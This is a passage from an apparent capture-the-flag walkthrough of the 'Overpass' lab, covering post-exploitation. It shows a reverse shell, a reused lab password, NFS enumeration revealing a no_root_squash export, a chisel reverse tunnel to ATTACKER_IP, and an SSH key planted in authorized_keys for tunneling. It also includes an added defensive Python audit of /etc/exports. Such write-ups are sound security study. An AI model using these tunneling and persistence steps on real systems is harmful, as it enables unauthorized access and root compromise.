Overpass HOSTING
Tunneling
- We can catch the reverse shell using netcat:
apache@ip-10-10-109-248 /$ id
uid=48(apache) gid=48(apache) groups=48(apache)
- We can switch to the user paradox using the same password as for FTP: paradox:ShibesAreGreat123
[paradox@ip-10-10-109-248 ~]$ id
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)
- The NFS service is running locally [NFS is using no_root_squash]. We can use SSH tunneling or chisel to access the service on our machine.
- If no_root_squash is used, remote root users are able to change any file on the shared file system.
[paradox@ip-10-10-109-248 ~]$ rpcinfo -p
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 20048 mountd
100005 1 tcp 20048 mountd
100024 1 udp 49437 status
100024 1 tcp 44301 status
100005 2 udp 20048 mountd
100005 2 tcp 20048 mountd
100005 3 udp 20048 mountd
100005 3 tcp 20048 mountd
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100021 1 udp 56458 nlockmgr
100021 3 udp 56458 nlockmgr
100021 4 udp 56458 nlockmgr
100021 1 tcp 45237 nlockmgr
100021 3 tcp 45237 nlockmgr
100021 4 tcp 45237 nlockmgr
[paradox@ip-10-10-109-248 ~]$ cat /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
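From the defender's side, the export line above can be caught by a simple audit. The following is an added example, not part of the original write-up: a Python check that parses /etc/exports text and reports the options that make this share dangerous. The function name audit_exports and the hardened sample line are constructed for illustration; quoted paths and backslash line continuations are not handled.

```python
import re

# Options that weaken an export, with the reason to report.
RISKY = {
    "no_root_squash": "remote uid 0 is kept as root on the share",
    "insecure": "requests from unprivileged source ports (>1023) are accepted",
    "rw": "share is writable",
}
# One client entry: optional host spec, optional "(opt,opt,...)".
ENTRY = re.compile(r"^([^()\s]*)(?:\(([^)]*)\))?$")

# The export line shown on this page.
PAGE_EXPORT = "/home/james *(rw,fsid=0,sync,no_root_squash,insecure)\n"
# Constructed sample of a tighter export (documentation address range).
HARDENED_EXPORT = "# constructed sample\n/srv/share 192.0.2.10(ro,sync,root_squash)\n"


def audit_exports(text):
    """Return a list of (path, client, option, reason) findings."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        path, *entries = line.split()
        for entry in entries:
            m = ENTRY.match(entry)
            if not m:
                continue
            client = m.group(1) or "*"  # "(opts)" with no host means everyone
            opts = set(filter(None, (m.group(2) or "").split(",")))
            if client == "*":
                findings.append((path, client, "*", "exported to any host"))
            for opt in sorted(opts & set(RISKY)):
                findings.append((path, client, opt, RISKY[opt]))
    return findings


if __name__ == "__main__":
    for path, client, opt, reason in audit_exports(PAGE_EXPORT):
        print(f"{path} {client}: {opt} -> {reason}")
```

Without these options the defaults are root_squash and secure, so the hardened sample produces no findings.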
Chisel
- Transfer the chisel binary to the victim machine.
- Server:
chisel server --reverse --port 8000
- Target:
chisel client ATTACKER_IP:8000 R:2049:127.0.0.1:2049
OTHER [SSH]
To use SSH tunneling on this machine we have to add our public SSH key to authorized_keys of the target machine.
# append the contents of our id_rsa.pub, not the file name
echo "<contents of id_rsa.pub>" >> /home/paradox/.ssh/authorized_keys
## SSH Tunneling
ssh -L 2049:localhost:2049 paradox@VICTIM_IP